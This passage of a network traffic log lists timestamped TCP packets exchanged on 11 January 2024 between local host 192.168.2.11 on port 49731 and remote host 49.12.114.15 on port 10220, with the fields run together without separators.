                                                                                                                                                  Jan 11, 2024 13:35:15.836107969 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836127996 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836164951 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836317062 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836376905 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836420059 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836426973 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836479902 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836481094 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836539030 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836553097 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836592913 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836674929 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836739063 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836777925 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836801052 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836839914 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836858988 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836901903 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836910963 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.836947918 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.836986065 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837023973 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837024927 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837064028 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837076902 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837115049 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837249994 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837290049 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837301970 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837347031 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837373972 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837450981 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837496996 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837516069 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837578058 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837639093 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837639093 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837639093 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837639093 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837683916 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837726116 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837811947 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837865114 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.837929964 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837929964 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:15.837977886 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:15.838165045 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.012778997 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.012834072 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.012880087 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.012907028 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.012918949 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.012984991 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013025999 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013037920 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013078928 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013207912 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013253927 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013267040 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013307095 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013324022 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013377905 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013381004 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013425112 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013463020 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013500929 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013508081 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013541937 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013559103 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013597965 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013768911 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013822079 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013830900 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013870955 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013884068 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013937950 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.013957977 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.013993025 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014035940 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014084101 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014122009 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014127970 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014163971 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014184952 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014225960 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014244080 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014286995 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014323950 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014358997 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014368057 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014400959 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014415979 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014456987 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014565945 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014607906 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014611959 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014653921 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014801979 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014822960 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014844894 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014863968 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014882088 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014921904 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.014962912 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.014983892 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015026093 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015047073 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015088081 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015109062 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015150070 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015189886 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015228987 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015247107 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015286922 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015326023 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015414953 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015638113 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015677929 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015716076 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015767097 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015811920 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.015892029 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.015985012 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016030073 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016051054 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016098976 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016136885 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016175032 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016213894 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016379118 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016429901 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016447067 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016496897 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016505957 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016522884 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016556025 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016572952 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016592026 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016644001 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016665936 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016702890 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016745090 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016781092 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016798973 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016819954 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016861916 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016901970 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016956091 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.016962051 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.016999960 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018260002 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018311024 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018325090 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018376112 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018399000 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018399000 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018420935 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018438101 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018493891 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018501997 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018534899 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018553972 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018640995 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018718004 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018764973 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018884897 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018933058 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.018953085 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.018996000 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019006014 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019049883 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019072056 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019113064 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019129992 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019171953 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019176960 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019222021 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019242048 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019284964 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019304037 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019346952 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019355059 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019396067 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019418001 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019459009 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019469976 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019514084 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019593954 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019659042 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019731045 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019776106 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019788027 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019826889 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019836903 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019875050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019891977 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.019931078 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.019968987 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020010948 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020332098 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020374060 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020395994 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020437002 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020447969 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020493031 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020560026 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020606995 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020675898 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020724058 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020731926 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020773888 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020812988 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020848989 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.020858049 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.020889997 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.021025896 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021070957 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.021085978 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021128893 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.021151066 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021204948 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021246910 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.021264076 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021303892 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.021313906 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021363020 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.021415949 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021496058 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.021518946 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.021557093 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022118092 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022171974 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022226095 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022272110 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022326946 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022372961 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022412062 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022443056 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022456884 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022480965 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022540092 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022588015 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022686958 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022731066 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022743940 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022787094 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022799969 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022867918 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022867918 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.022912025 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.022986889 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023031950 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023072004 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023113966 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023153067 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023192883 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023204088 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023235083 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023394108 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023439884 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023493052 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023511887 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023540974 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023562908 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023578882 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023643017 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023648977 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023694992 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023710966 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023757935 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023775101 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023816109 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023824930 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023864985 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023885965 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023919106 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.023927927 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023957968 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.023996115 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024035931 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024184942 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024229050 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024236917 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024281025 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024430037 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024481058 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024493933 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024538994 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024548054 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024594069 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024601936 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024661064 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024672031 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024736881 CET102204973149.12.114.15192.168.2.11
                                                                                                                                                  Jan 11, 2024 13:35:16.024786949 CET4973110220192.168.2.1149.12.114.15
                                                                                                                                                  Jan 11, 2024 13:35:16.024825096 CET102204973149.12.114.15192.168.2.11
